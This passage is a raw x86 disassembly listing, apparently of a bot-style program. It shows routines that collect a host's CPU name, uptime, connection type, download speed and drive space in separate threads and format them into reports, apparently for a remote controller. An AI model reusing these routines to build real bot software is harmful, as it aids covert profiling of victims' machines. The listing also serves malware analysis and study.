and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DE30
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DE30
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DE30
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset loc_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset loc_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41EF48
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
push [ebp+var_824]
call dword_41DE8C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp dword_41DE7C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call dword_41DE7C ; InternetGetConnectedStateExA
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DE30
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DE30
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DE30
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: sub_4167F1+215�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov dword_41E2D0, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_41E2D0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
